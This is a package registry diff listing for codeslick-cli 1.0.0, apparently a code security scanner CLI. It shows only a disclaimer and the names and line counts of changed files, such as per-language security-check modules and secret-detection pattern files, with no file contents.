codeslick-cli 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (455) hide show
  1. package/README.md +458 -0
  2. package/__tests__/cli-reporter.test.ts +86 -0
  3. package/__tests__/config-loader.test.ts +247 -0
  4. package/__tests__/local-scanner.test.ts +245 -0
  5. package/bin/codeslick.cjs +153 -0
  6. package/dist/packages/cli/src/commands/auth.d.ts +36 -0
  7. package/dist/packages/cli/src/commands/auth.d.ts.map +1 -0
  8. package/dist/packages/cli/src/commands/auth.js +226 -0
  9. package/dist/packages/cli/src/commands/auth.js.map +1 -0
  10. package/dist/packages/cli/src/commands/config.d.ts +37 -0
  11. package/dist/packages/cli/src/commands/config.d.ts.map +1 -0
  12. package/dist/packages/cli/src/commands/config.js +196 -0
  13. package/dist/packages/cli/src/commands/config.js.map +1 -0
  14. package/dist/packages/cli/src/commands/init.d.ts +32 -0
  15. package/dist/packages/cli/src/commands/init.d.ts.map +1 -0
  16. package/dist/packages/cli/src/commands/init.js +171 -0
  17. package/dist/packages/cli/src/commands/init.js.map +1 -0
  18. package/dist/packages/cli/src/commands/scan.d.ts +40 -0
  19. package/dist/packages/cli/src/commands/scan.d.ts.map +1 -0
  20. package/dist/packages/cli/src/commands/scan.js +204 -0
  21. package/dist/packages/cli/src/commands/scan.js.map +1 -0
  22. package/dist/packages/cli/src/config/config-loader.d.ts +67 -0
  23. package/dist/packages/cli/src/config/config-loader.d.ts.map +1 -0
  24. package/dist/packages/cli/src/config/config-loader.js +146 -0
  25. package/dist/packages/cli/src/config/config-loader.js.map +1 -0
  26. package/dist/packages/cli/src/reporters/cli-reporter.d.ts +69 -0
  27. package/dist/packages/cli/src/reporters/cli-reporter.d.ts.map +1 -0
  28. package/dist/packages/cli/src/reporters/cli-reporter.js +244 -0
  29. package/dist/packages/cli/src/reporters/cli-reporter.js.map +1 -0
  30. package/dist/packages/cli/src/scanner/local-scanner.d.ts +92 -0
  31. package/dist/packages/cli/src/scanner/local-scanner.d.ts.map +1 -0
  32. package/dist/packages/cli/src/scanner/local-scanner.js +221 -0
  33. package/dist/packages/cli/src/scanner/local-scanner.js.map +1 -0
  34. package/dist/src/lib/analyzers/helpers/ai-code-detection-utils.d.ts +88 -0
  35. package/dist/src/lib/analyzers/helpers/ai-code-detection-utils.d.ts.map +1 -0
  36. package/dist/src/lib/analyzers/helpers/ai-code-detection-utils.js +371 -0
  37. package/dist/src/lib/analyzers/helpers/ai-code-detection-utils.js.map +1 -0
  38. package/dist/src/lib/analyzers/helpers/jsx-helpers.d.ts +63 -0
  39. package/dist/src/lib/analyzers/helpers/jsx-helpers.d.ts.map +1 -0
  40. package/dist/src/lib/analyzers/helpers/jsx-helpers.js +95 -0
  41. package/dist/src/lib/analyzers/helpers/jsx-helpers.js.map +1 -0
  42. package/dist/src/lib/analyzers/helpers/variable-tracker.d.ts +59 -0
  43. package/dist/src/lib/analyzers/helpers/variable-tracker.d.ts.map +1 -0
  44. package/dist/src/lib/analyzers/helpers/variable-tracker.js +231 -0
  45. package/dist/src/lib/analyzers/helpers/variable-tracker.js.map +1 -0
  46. package/dist/src/lib/analyzers/java/security-checks/access-control.d.ts +20 -0
  47. package/dist/src/lib/analyzers/java/security-checks/access-control.d.ts.map +1 -0
  48. package/dist/src/lib/analyzers/java/security-checks/access-control.js +129 -0
  49. package/dist/src/lib/analyzers/java/security-checks/access-control.js.map +1 -0
  50. package/dist/src/lib/analyzers/java/security-checks/ai-generated-code.d.ts +25 -0
  51. package/dist/src/lib/analyzers/java/security-checks/ai-generated-code.d.ts.map +1 -0
  52. package/dist/src/lib/analyzers/java/security-checks/ai-generated-code.js +221 -0
  53. package/dist/src/lib/analyzers/java/security-checks/ai-generated-code.js.map +1 -0
  54. package/dist/src/lib/analyzers/java/security-checks/code-quality.d.ts +18 -0
  55. package/dist/src/lib/analyzers/java/security-checks/code-quality.d.ts.map +1 -0
  56. package/dist/src/lib/analyzers/java/security-checks/code-quality.js +84 -0
  57. package/dist/src/lib/analyzers/java/security-checks/code-quality.js.map +1 -0
  58. package/dist/src/lib/analyzers/java/security-checks/crypto-validation.d.ts +18 -0
  59. package/dist/src/lib/analyzers/java/security-checks/crypto-validation.d.ts.map +1 -0
  60. package/dist/src/lib/analyzers/java/security-checks/crypto-validation.js +161 -0
  61. package/dist/src/lib/analyzers/java/security-checks/crypto-validation.js.map +1 -0
  62. package/dist/src/lib/analyzers/java/security-checks/deserialization-xxe.d.ts +20 -0
  63. package/dist/src/lib/analyzers/java/security-checks/deserialization-xxe.d.ts.map +1 -0
  64. package/dist/src/lib/analyzers/java/security-checks/deserialization-xxe.js +163 -0
  65. package/dist/src/lib/analyzers/java/security-checks/deserialization-xxe.js.map +1 -0
  66. package/dist/src/lib/analyzers/java/security-checks/enhanced-supply-chain.d.ts +24 -0
  67. package/dist/src/lib/analyzers/java/security-checks/enhanced-supply-chain.d.ts.map +1 -0
  68. package/dist/src/lib/analyzers/java/security-checks/enhanced-supply-chain.js +178 -0
  69. package/dist/src/lib/analyzers/java/security-checks/enhanced-supply-chain.js.map +1 -0
  70. package/dist/src/lib/analyzers/java/security-checks/exception-handling.d.ts +25 -0
  71. package/dist/src/lib/analyzers/java/security-checks/exception-handling.d.ts.map +1 -0
  72. package/dist/src/lib/analyzers/java/security-checks/exception-handling.js +179 -0
  73. package/dist/src/lib/analyzers/java/security-checks/exception-handling.js.map +1 -0
  74. package/dist/src/lib/analyzers/java/security-checks/file-operations.d.ts +17 -0
  75. package/dist/src/lib/analyzers/java/security-checks/file-operations.d.ts.map +1 -0
  76. package/dist/src/lib/analyzers/java/security-checks/file-operations.js +67 -0
  77. package/dist/src/lib/analyzers/java/security-checks/file-operations.js.map +1 -0
  78. package/dist/src/lib/analyzers/java/security-checks/framework-security.d.ts +25 -0
  79. package/dist/src/lib/analyzers/java/security-checks/framework-security.d.ts.map +1 -0
  80. package/dist/src/lib/analyzers/java/security-checks/framework-security.js +396 -0
  81. package/dist/src/lib/analyzers/java/security-checks/framework-security.js.map +1 -0
  82. package/dist/src/lib/analyzers/java/security-checks/hardcoded-credentials.d.ts +20 -0
  83. package/dist/src/lib/analyzers/java/security-checks/hardcoded-credentials.d.ts.map +1 -0
  84. package/dist/src/lib/analyzers/java/security-checks/hardcoded-credentials.js +123 -0
  85. package/dist/src/lib/analyzers/java/security-checks/hardcoded-credentials.js.map +1 -0
  86. package/dist/src/lib/analyzers/java/security-checks/injection-attacks.d.ts +23 -0
  87. package/dist/src/lib/analyzers/java/security-checks/injection-attacks.d.ts.map +1 -0
  88. package/dist/src/lib/analyzers/java/security-checks/injection-attacks.js +201 -0
  89. package/dist/src/lib/analyzers/java/security-checks/injection-attacks.js.map +1 -0
  90. package/dist/src/lib/analyzers/java/security-checks/insecure-design.d.ts +20 -0
  91. package/dist/src/lib/analyzers/java/security-checks/insecure-design.d.ts.map +1 -0
  92. package/dist/src/lib/analyzers/java/security-checks/insecure-design.js +121 -0
  93. package/dist/src/lib/analyzers/java/security-checks/insecure-design.js.map +1 -0
  94. package/dist/src/lib/analyzers/java/security-checks/logging-failures.d.ts +20 -0
  95. package/dist/src/lib/analyzers/java/security-checks/logging-failures.d.ts.map +1 -0
  96. package/dist/src/lib/analyzers/java/security-checks/logging-failures.js +89 -0
  97. package/dist/src/lib/analyzers/java/security-checks/logging-failures.js.map +1 -0
  98. package/dist/src/lib/analyzers/java/security-checks/security-misconfiguration.d.ts +26 -0
  99. package/dist/src/lib/analyzers/java/security-checks/security-misconfiguration.d.ts.map +1 -0
  100. package/dist/src/lib/analyzers/java/security-checks/security-misconfiguration.js +309 -0
  101. package/dist/src/lib/analyzers/java/security-checks/security-misconfiguration.js.map +1 -0
  102. package/dist/src/lib/analyzers/java/security-checks/unsafe-patterns.d.ts +18 -0
  103. package/dist/src/lib/analyzers/java/security-checks/unsafe-patterns.d.ts.map +1 -0
  104. package/dist/src/lib/analyzers/java/security-checks/unsafe-patterns.js +114 -0
  105. package/dist/src/lib/analyzers/java/security-checks/unsafe-patterns.js.map +1 -0
  106. package/dist/src/lib/analyzers/java/utils/createVulnerability.d.ts +58 -0
  107. package/dist/src/lib/analyzers/java/utils/createVulnerability.d.ts.map +1 -0
  108. package/dist/src/lib/analyzers/java/utils/createVulnerability.js +71 -0
  109. package/dist/src/lib/analyzers/java/utils/createVulnerability.js.map +1 -0
  110. package/dist/src/lib/analyzers/java-analyzer.d.ts +209 -0
  111. package/dist/src/lib/analyzers/java-analyzer.d.ts.map +1 -0
  112. package/dist/src/lib/analyzers/java-analyzer.js +1720 -0
  113. package/dist/src/lib/analyzers/java-analyzer.js.map +1 -0
  114. package/dist/src/lib/analyzers/javascript/quality-checks/ai-hallucinations.d.ts +27 -0
  115. package/dist/src/lib/analyzers/javascript/quality-checks/ai-hallucinations.d.ts.map +1 -0
  116. package/dist/src/lib/analyzers/javascript/quality-checks/ai-hallucinations.js +123 -0
  117. package/dist/src/lib/analyzers/javascript/quality-checks/ai-hallucinations.js.map +1 -0
  118. package/dist/src/lib/analyzers/javascript/quality-checks/async-patterns.d.ts +44 -0
  119. package/dist/src/lib/analyzers/javascript/quality-checks/async-patterns.d.ts.map +1 -0
  120. package/dist/src/lib/analyzers/javascript/quality-checks/async-patterns.js +224 -0
  121. package/dist/src/lib/analyzers/javascript/quality-checks/async-patterns.js.map +1 -0
  122. package/dist/src/lib/analyzers/javascript/quality-checks/code-patterns.d.ts +50 -0
  123. package/dist/src/lib/analyzers/javascript/quality-checks/code-patterns.d.ts.map +1 -0
  124. package/dist/src/lib/analyzers/javascript/quality-checks/code-patterns.js +284 -0
  125. package/dist/src/lib/analyzers/javascript/quality-checks/code-patterns.js.map +1 -0
  126. package/dist/src/lib/analyzers/javascript/quality-checks/comparison-issues.d.ts +27 -0
  127. package/dist/src/lib/analyzers/javascript/quality-checks/comparison-issues.d.ts.map +1 -0
  128. package/dist/src/lib/analyzers/javascript/quality-checks/comparison-issues.js +86 -0
  129. package/dist/src/lib/analyzers/javascript/quality-checks/comparison-issues.js.map +1 -0
  130. package/dist/src/lib/analyzers/javascript/quality-checks/reference-errors.d.ts +32 -0
  131. package/dist/src/lib/analyzers/javascript/quality-checks/reference-errors.d.ts.map +1 -0
  132. package/dist/src/lib/analyzers/javascript/quality-checks/reference-errors.js +44 -0
  133. package/dist/src/lib/analyzers/javascript/quality-checks/reference-errors.js.map +1 -0
  134. package/dist/src/lib/analyzers/javascript/security-checks/access-control.d.ts +22 -0
  135. package/dist/src/lib/analyzers/javascript/security-checks/access-control.d.ts.map +1 -0
  136. package/dist/src/lib/analyzers/javascript/security-checks/access-control.js +168 -0
  137. package/dist/src/lib/analyzers/javascript/security-checks/access-control.js.map +1 -0
  138. package/dist/src/lib/analyzers/javascript/security-checks/ai-generated-code.d.ts +25 -0
  139. package/dist/src/lib/analyzers/javascript/security-checks/ai-generated-code.d.ts.map +1 -0
  140. package/dist/src/lib/analyzers/javascript/security-checks/ai-generated-code.js +232 -0
  141. package/dist/src/lib/analyzers/javascript/security-checks/ai-generated-code.js.map +1 -0
  142. package/dist/src/lib/analyzers/javascript/security-checks/authentication-failures.d.ts +27 -0
  143. package/dist/src/lib/analyzers/javascript/security-checks/authentication-failures.d.ts.map +1 -0
  144. package/dist/src/lib/analyzers/javascript/security-checks/authentication-failures.js +222 -0
  145. package/dist/src/lib/analyzers/javascript/security-checks/authentication-failures.js.map +1 -0
  146. package/dist/src/lib/analyzers/javascript/security-checks/credential-crypto.d.ts +28 -0
  147. package/dist/src/lib/analyzers/javascript/security-checks/credential-crypto.d.ts.map +1 -0
  148. package/dist/src/lib/analyzers/javascript/security-checks/credential-crypto.js +176 -0
  149. package/dist/src/lib/analyzers/javascript/security-checks/credential-crypto.js.map +1 -0
  150. package/dist/src/lib/analyzers/javascript/security-checks/enhanced-supply-chain.d.ts +23 -0
  151. package/dist/src/lib/analyzers/javascript/security-checks/enhanced-supply-chain.d.ts.map +1 -0
  152. package/dist/src/lib/analyzers/javascript/security-checks/enhanced-supply-chain.js +113 -0
  153. package/dist/src/lib/analyzers/javascript/security-checks/enhanced-supply-chain.js.map +1 -0
  154. package/dist/src/lib/analyzers/javascript/security-checks/exception-handling.d.ts +28 -0
  155. package/dist/src/lib/analyzers/javascript/security-checks/exception-handling.d.ts.map +1 -0
  156. package/dist/src/lib/analyzers/javascript/security-checks/exception-handling.js +227 -0
  157. package/dist/src/lib/analyzers/javascript/security-checks/exception-handling.js.map +1 -0
  158. package/dist/src/lib/analyzers/javascript/security-checks/injection-attacks.d.ts +32 -0
  159. package/dist/src/lib/analyzers/javascript/security-checks/injection-attacks.d.ts.map +1 -0
  160. package/dist/src/lib/analyzers/javascript/security-checks/injection-attacks.js +260 -0
  161. package/dist/src/lib/analyzers/javascript/security-checks/injection-attacks.js.map +1 -0
  162. package/dist/src/lib/analyzers/javascript/security-checks/insecure-design.d.ts +26 -0
  163. package/dist/src/lib/analyzers/javascript/security-checks/insecure-design.d.ts.map +1 -0
  164. package/dist/src/lib/analyzers/javascript/security-checks/insecure-design.js +164 -0
  165. package/dist/src/lib/analyzers/javascript/security-checks/insecure-design.js.map +1 -0
  166. package/dist/src/lib/analyzers/javascript/security-checks/security-misconfiguration.d.ts +26 -0
  167. package/dist/src/lib/analyzers/javascript/security-checks/security-misconfiguration.d.ts.map +1 -0
  168. package/dist/src/lib/analyzers/javascript/security-checks/security-misconfiguration.js +775 -0
  169. package/dist/src/lib/analyzers/javascript/security-checks/security-misconfiguration.js.map +1 -0
  170. package/dist/src/lib/analyzers/javascript/security-checks/software-integrity.d.ts +25 -0
  171. package/dist/src/lib/analyzers/javascript/security-checks/software-integrity.d.ts.map +1 -0
  172. package/dist/src/lib/analyzers/javascript/security-checks/software-integrity.js +168 -0
  173. package/dist/src/lib/analyzers/javascript/security-checks/software-integrity.js.map +1 -0
  174. package/dist/src/lib/analyzers/javascript/security-checks/storage-security.d.ts +27 -0
  175. package/dist/src/lib/analyzers/javascript/security-checks/storage-security.d.ts.map +1 -0
  176. package/dist/src/lib/analyzers/javascript/security-checks/storage-security.js +108 -0
  177. package/dist/src/lib/analyzers/javascript/security-checks/storage-security.js.map +1 -0
  178. package/dist/src/lib/analyzers/javascript/security-checks/xss-dom-security.d.ts +28 -0
  179. package/dist/src/lib/analyzers/javascript/security-checks/xss-dom-security.d.ts.map +1 -0
  180. package/dist/src/lib/analyzers/javascript/security-checks/xss-dom-security.js +143 -0
  181. package/dist/src/lib/analyzers/javascript/security-checks/xss-dom-security.js.map +1 -0
  182. package/dist/src/lib/analyzers/javascript/syntax/syntax-helpers.d.ts +53 -0
  183. package/dist/src/lib/analyzers/javascript/syntax/syntax-helpers.d.ts.map +1 -0
  184. package/dist/src/lib/analyzers/javascript/syntax/syntax-helpers.js +144 -0
  185. package/dist/src/lib/analyzers/javascript/syntax/syntax-helpers.js.map +1 -0
  186. package/dist/src/lib/analyzers/javascript/syntax/typescript-syntax.d.ts +72 -0
  187. package/dist/src/lib/analyzers/javascript/syntax/typescript-syntax.d.ts.map +1 -0
  188. package/dist/src/lib/analyzers/javascript/syntax/typescript-syntax.js +314 -0
  189. package/dist/src/lib/analyzers/javascript/syntax/typescript-syntax.js.map +1 -0
  190. package/dist/src/lib/analyzers/javascript/utils/createVulnerability.d.ts +58 -0
  191. package/dist/src/lib/analyzers/javascript/utils/createVulnerability.d.ts.map +1 -0
  192. package/dist/src/lib/analyzers/javascript/utils/createVulnerability.js +71 -0
  193. package/dist/src/lib/analyzers/javascript/utils/createVulnerability.js.map +1 -0
  194. package/dist/src/lib/analyzers/javascript/utils/metrics-calculator.d.ts +36 -0
  195. package/dist/src/lib/analyzers/javascript/utils/metrics-calculator.d.ts.map +1 -0
  196. package/dist/src/lib/analyzers/javascript/utils/metrics-calculator.js +70 -0
  197. package/dist/src/lib/analyzers/javascript/utils/metrics-calculator.js.map +1 -0
  198. package/dist/src/lib/analyzers/javascript/utils/performance-analyzer.d.ts +29 -0
  199. package/dist/src/lib/analyzers/javascript/utils/performance-analyzer.d.ts.map +1 -0
  200. package/dist/src/lib/analyzers/javascript/utils/performance-analyzer.js +55 -0
  201. package/dist/src/lib/analyzers/javascript/utils/performance-analyzer.js.map +1 -0
  202. package/dist/src/lib/analyzers/javascript-analyzer.d.ts +95 -0
  203. package/dist/src/lib/analyzers/javascript-analyzer.d.ts.map +1 -0
  204. package/dist/src/lib/analyzers/javascript-analyzer.js +2141 -0
  205. package/dist/src/lib/analyzers/javascript-analyzer.js.map +1 -0
  206. package/dist/src/lib/analyzers/python/security-checks/access-control.d.ts +21 -0
  207. package/dist/src/lib/analyzers/python/security-checks/access-control.d.ts.map +1 -0
  208. package/dist/src/lib/analyzers/python/security-checks/access-control.js +305 -0
  209. package/dist/src/lib/analyzers/python/security-checks/access-control.js.map +1 -0
  210. package/dist/src/lib/analyzers/python/security-checks/ai-generated-code.d.ts +25 -0
  211. package/dist/src/lib/analyzers/python/security-checks/ai-generated-code.d.ts.map +1 -0
  212. package/dist/src/lib/analyzers/python/security-checks/ai-generated-code.js +242 -0
  213. package/dist/src/lib/analyzers/python/security-checks/ai-generated-code.js.map +1 -0
  214. package/dist/src/lib/analyzers/python/security-checks/authentication-flaws.d.ts +24 -0
  215. package/dist/src/lib/analyzers/python/security-checks/authentication-flaws.d.ts.map +1 -0
  216. package/dist/src/lib/analyzers/python/security-checks/authentication-flaws.js +207 -0
  217. package/dist/src/lib/analyzers/python/security-checks/authentication-flaws.js.map +1 -0
  218. package/dist/src/lib/analyzers/python/security-checks/code-quality.d.ts +27 -0
  219. package/dist/src/lib/analyzers/python/security-checks/code-quality.d.ts.map +1 -0
  220. package/dist/src/lib/analyzers/python/security-checks/code-quality.js +206 -0
  221. package/dist/src/lib/analyzers/python/security-checks/code-quality.js.map +1 -0
  222. package/dist/src/lib/analyzers/python/security-checks/credentials-crypto.d.ts +24 -0
  223. package/dist/src/lib/analyzers/python/security-checks/credentials-crypto.d.ts.map +1 -0
  224. package/dist/src/lib/analyzers/python/security-checks/credentials-crypto.js +113 -0
  225. package/dist/src/lib/analyzers/python/security-checks/credentials-crypto.js.map +1 -0
  226. package/dist/src/lib/analyzers/python/security-checks/crypto-failures.d.ts +20 -0
  227. package/dist/src/lib/analyzers/python/security-checks/crypto-failures.d.ts.map +1 -0
  228. package/dist/src/lib/analyzers/python/security-checks/crypto-failures.js +129 -0
  229. package/dist/src/lib/analyzers/python/security-checks/crypto-failures.js.map +1 -0
  230. package/dist/src/lib/analyzers/python/security-checks/data-integrity.d.ts +19 -0
  231. package/dist/src/lib/analyzers/python/security-checks/data-integrity.d.ts.map +1 -0
  232. package/dist/src/lib/analyzers/python/security-checks/data-integrity.js +90 -0
  233. package/dist/src/lib/analyzers/python/security-checks/data-integrity.js.map +1 -0
  234. package/dist/src/lib/analyzers/python/security-checks/deserialization.d.ts +20 -0
  235. package/dist/src/lib/analyzers/python/security-checks/deserialization.d.ts.map +1 -0
  236. package/dist/src/lib/analyzers/python/security-checks/deserialization.js +68 -0
  237. package/dist/src/lib/analyzers/python/security-checks/deserialization.js.map +1 -0
  238. package/dist/src/lib/analyzers/python/security-checks/django-security.d.ts +25 -0
  239. package/dist/src/lib/analyzers/python/security-checks/django-security.d.ts.map +1 -0
  240. package/dist/src/lib/analyzers/python/security-checks/django-security.js +180 -0
  241. package/dist/src/lib/analyzers/python/security-checks/django-security.js.map +1 -0
  242. package/dist/src/lib/analyzers/python/security-checks/enhanced-supply-chain.d.ts +23 -0
  243. package/dist/src/lib/analyzers/python/security-checks/enhanced-supply-chain.d.ts.map +1 -0
  244. package/dist/src/lib/analyzers/python/security-checks/enhanced-supply-chain.js +127 -0
  245. package/dist/src/lib/analyzers/python/security-checks/enhanced-supply-chain.js.map +1 -0
  246. package/dist/src/lib/analyzers/python/security-checks/exception-handling.d.ts +23 -0
  247. package/dist/src/lib/analyzers/python/security-checks/exception-handling.d.ts.map +1 -0
  248. package/dist/src/lib/analyzers/python/security-checks/exception-handling.js +120 -0
  249. package/dist/src/lib/analyzers/python/security-checks/exception-handling.js.map +1 -0
  250. package/dist/src/lib/analyzers/python/security-checks/flask-security.d.ts +24 -0
  251. package/dist/src/lib/analyzers/python/security-checks/flask-security.d.ts.map +1 -0
  252. package/dist/src/lib/analyzers/python/security-checks/flask-security.js +143 -0
  253. package/dist/src/lib/analyzers/python/security-checks/flask-security.js.map +1 -0
  254. package/dist/src/lib/analyzers/python/security-checks/injection-attacks.d.ts +28 -0
  255. package/dist/src/lib/analyzers/python/security-checks/injection-attacks.d.ts.map +1 -0
  256. package/dist/src/lib/analyzers/python/security-checks/injection-attacks.js +174 -0
  257. package/dist/src/lib/analyzers/python/security-checks/injection-attacks.js.map +1 -0
  258. package/dist/src/lib/analyzers/python/security-checks/insecure-design.d.ts +20 -0
  259. package/dist/src/lib/analyzers/python/security-checks/insecure-design.d.ts.map +1 -0
  260. package/dist/src/lib/analyzers/python/security-checks/insecure-design.js +160 -0
  261. package/dist/src/lib/analyzers/python/security-checks/insecure-design.js.map +1 -0
  262. package/dist/src/lib/analyzers/python/security-checks/logging-failures.d.ts +20 -0
  263. package/dist/src/lib/analyzers/python/security-checks/logging-failures.d.ts.map +1 -0
  264. package/dist/src/lib/analyzers/python/security-checks/logging-failures.js +121 -0
  265. package/dist/src/lib/analyzers/python/security-checks/logging-failures.js.map +1 -0
  266. package/dist/src/lib/analyzers/python/security-checks/nosql-injection.d.ts +26 -0
  267. package/dist/src/lib/analyzers/python/security-checks/nosql-injection.d.ts.map +1 -0
  268. package/dist/src/lib/analyzers/python/security-checks/nosql-injection.js +248 -0
  269. package/dist/src/lib/analyzers/python/security-checks/nosql-injection.js.map +1 -0
  270. package/dist/src/lib/analyzers/python/security-checks/security-misconfiguration.d.ts +26 -0
  271. package/dist/src/lib/analyzers/python/security-checks/security-misconfiguration.d.ts.map +1 -0
  272. package/dist/src/lib/analyzers/python/security-checks/security-misconfiguration.js +375 -0
  273. package/dist/src/lib/analyzers/python/security-checks/security-misconfiguration.js.map +1 -0
  274. package/dist/src/lib/analyzers/python/security-checks/ssrf-detection.d.ts +26 -0
  275. package/dist/src/lib/analyzers/python/security-checks/ssrf-detection.d.ts.map +1 -0
  276. package/dist/src/lib/analyzers/python/security-checks/ssrf-detection.js +160 -0
  277. package/dist/src/lib/analyzers/python/security-checks/ssrf-detection.js.map +1 -0
  278. package/dist/src/lib/analyzers/python/security-checks/web-security.d.ts +23 -0
  279. package/dist/src/lib/analyzers/python/security-checks/web-security.d.ts.map +1 -0
  280. package/dist/src/lib/analyzers/python/security-checks/web-security.js +117 -0
  281. package/dist/src/lib/analyzers/python/security-checks/web-security.js.map +1 -0
  282. package/dist/src/lib/analyzers/python/utils/createVulnerability.d.ts +58 -0
  283. package/dist/src/lib/analyzers/python/utils/createVulnerability.d.ts.map +1 -0
  284. package/dist/src/lib/analyzers/python/utils/createVulnerability.js +71 -0
  285. package/dist/src/lib/analyzers/python/utils/createVulnerability.js.map +1 -0
  286. package/dist/src/lib/analyzers/python-analyzer.d.ts +111 -0
  287. package/dist/src/lib/analyzers/python-analyzer.d.ts.map +1 -0
  288. package/dist/src/lib/analyzers/python-analyzer.js +1600 -0
  289. package/dist/src/lib/analyzers/python-analyzer.js.map +1 -0
  290. package/dist/src/lib/analyzers/secrets/patterns/api-keys/ai-providers.d.ts +14 -0
  291. package/dist/src/lib/analyzers/secrets/patterns/api-keys/ai-providers.d.ts.map +1 -0
  292. package/dist/src/lib/analyzers/secrets/patterns/api-keys/ai-providers.js +47 -0
  293. package/dist/src/lib/analyzers/secrets/patterns/api-keys/ai-providers.js.map +1 -0
  294. package/dist/src/lib/analyzers/secrets/patterns/api-keys/aws.d.ts +13 -0
  295. package/dist/src/lib/analyzers/secrets/patterns/api-keys/aws.d.ts.map +1 -0
  296. package/dist/src/lib/analyzers/secrets/patterns/api-keys/aws.js +36 -0
  297. package/dist/src/lib/analyzers/secrets/patterns/api-keys/aws.js.map +1 -0
  298. package/dist/src/lib/analyzers/secrets/patterns/api-keys/cloud-providers.d.ts +15 -0
  299. package/dist/src/lib/analyzers/secrets/patterns/api-keys/cloud-providers.d.ts.map +1 -0
  300. package/dist/src/lib/analyzers/secrets/patterns/api-keys/cloud-providers.js +68 -0
  301. package/dist/src/lib/analyzers/secrets/patterns/api-keys/cloud-providers.js.map +1 -0
  302. package/dist/src/lib/analyzers/secrets/patterns/api-keys/communication.d.ts +15 -0
  303. package/dist/src/lib/analyzers/secrets/patterns/api-keys/communication.d.ts.map +1 -0
  304. package/dist/src/lib/analyzers/secrets/patterns/api-keys/communication.js +68 -0
  305. package/dist/src/lib/analyzers/secrets/patterns/api-keys/communication.js.map +1 -0
  306. package/dist/src/lib/analyzers/secrets/patterns/api-keys/generic.d.ts +12 -0
  307. package/dist/src/lib/analyzers/secrets/patterns/api-keys/generic.d.ts.map +1 -0
  308. package/dist/src/lib/analyzers/secrets/patterns/api-keys/generic.js +45 -0
  309. package/dist/src/lib/analyzers/secrets/patterns/api-keys/generic.js.map +1 -0
  310. package/dist/src/lib/analyzers/secrets/patterns/api-keys/github.d.ts +14 -0
  311. package/dist/src/lib/analyzers/secrets/patterns/api-keys/github.d.ts.map +1 -0
  312. package/dist/src/lib/analyzers/secrets/patterns/api-keys/github.js +47 -0
  313. package/dist/src/lib/analyzers/secrets/patterns/api-keys/github.js.map +1 -0
  314. package/dist/src/lib/analyzers/secrets/patterns/api-keys/stripe.d.ts +13 -0
  315. package/dist/src/lib/analyzers/secrets/patterns/api-keys/stripe.d.ts.map +1 -0
  316. package/dist/src/lib/analyzers/secrets/patterns/api-keys/stripe.js +36 -0
  317. package/dist/src/lib/analyzers/secrets/patterns/api-keys/stripe.js.map +1 -0
  318. package/dist/src/lib/analyzers/secrets/patterns/api-keys.d.ts +15 -0
  319. package/dist/src/lib/analyzers/secrets/patterns/api-keys.d.ts.map +1 -0
  320. package/dist/src/lib/analyzers/secrets/patterns/api-keys.js +32 -0
  321. package/dist/src/lib/analyzers/secrets/patterns/api-keys.js.map +1 -0
  322. package/dist/src/lib/analyzers/secrets/patterns/credentials.d.ts +15 -0
  323. package/dist/src/lib/analyzers/secrets/patterns/credentials.d.ts.map +1 -0
  324. package/dist/src/lib/analyzers/secrets/patterns/credentials.js +68 -0
  325. package/dist/src/lib/analyzers/secrets/patterns/credentials.js.map +1 -0
  326. package/dist/src/lib/analyzers/secrets/patterns/private-keys.d.ts +16 -0
  327. package/dist/src/lib/analyzers/secrets/patterns/private-keys.d.ts.map +1 -0
  328. package/dist/src/lib/analyzers/secrets/patterns/private-keys.js +79 -0
  329. package/dist/src/lib/analyzers/secrets/patterns/private-keys.js.map +1 -0
  330. package/dist/src/lib/analyzers/secrets/patterns/tokens.d.ts +15 -0
  331. package/dist/src/lib/analyzers/secrets/patterns/tokens.d.ts.map +1 -0
  332. package/dist/src/lib/analyzers/secrets/patterns/tokens.js +58 -0
  333. package/dist/src/lib/analyzers/secrets/patterns/tokens.js.map +1 -0
  334. package/dist/src/lib/analyzers/secrets/secrets-analyzer.d.ts +88 -0
  335. package/dist/src/lib/analyzers/secrets/secrets-analyzer.d.ts.map +1 -0
  336. package/dist/src/lib/analyzers/secrets/secrets-analyzer.js +162 -0
  337. package/dist/src/lib/analyzers/secrets/secrets-analyzer.js.map +1 -0
  338. package/dist/src/lib/analyzers/secrets/validators/context-checker.d.ts +56 -0
  339. package/dist/src/lib/analyzers/secrets/validators/context-checker.d.ts.map +1 -0
  340. package/dist/src/lib/analyzers/secrets/validators/context-checker.js +199 -0
  341. package/dist/src/lib/analyzers/secrets/validators/context-checker.js.map +1 -0
  342. package/dist/src/lib/analyzers/secrets/validators/entropy-checker.d.ts +56 -0
  343. package/dist/src/lib/analyzers/secrets/validators/entropy-checker.d.ts.map +1 -0
  344. package/dist/src/lib/analyzers/secrets/validators/entropy-checker.js +102 -0
  345. package/dist/src/lib/analyzers/secrets/validators/entropy-checker.js.map +1 -0
  346. package/dist/src/lib/analyzers/security-checks/es6-security.d.ts +38 -0
  347. package/dist/src/lib/analyzers/security-checks/es6-security.d.ts.map +1 -0
  348. package/dist/src/lib/analyzers/security-checks/es6-security.js +125 -0
  349. package/dist/src/lib/analyzers/security-checks/es6-security.js.map +1 -0
  350. package/dist/src/lib/analyzers/security-checks/python-async-security.d.ts +46 -0
  351. package/dist/src/lib/analyzers/security-checks/python-async-security.d.ts.map +1 -0
  352. package/dist/src/lib/analyzers/security-checks/python-async-security.js +92 -0
  353. package/dist/src/lib/analyzers/security-checks/python-async-security.js.map +1 -0
  354. package/dist/src/lib/analyzers/security-checks/react-security.d.ts +49 -0
  355. package/dist/src/lib/analyzers/security-checks/react-security.d.ts.map +1 -0
  356. package/dist/src/lib/analyzers/security-checks/react-security.js +125 -0
  357. package/dist/src/lib/analyzers/security-checks/react-security.js.map +1 -0
  358. package/dist/src/lib/analyzers/types.d.ts +92 -0
  359. package/dist/src/lib/analyzers/types.d.ts.map +1 -0
  360. package/dist/src/lib/analyzers/types.js +3 -0
  361. package/dist/src/lib/analyzers/types.js.map +1 -0
  362. package/dist/src/lib/analyzers/typescript/security-checks/access-control.d.ts +19 -0
  363. package/dist/src/lib/analyzers/typescript/security-checks/access-control.d.ts.map +1 -0
  364. package/dist/src/lib/analyzers/typescript/security-checks/access-control.js +210 -0
  365. package/dist/src/lib/analyzers/typescript/security-checks/access-control.js.map +1 -0
  366. package/dist/src/lib/analyzers/typescript/security-checks/ai-generated-code.d.ts +25 -0
  367. package/dist/src/lib/analyzers/typescript/security-checks/ai-generated-code.d.ts.map +1 -0
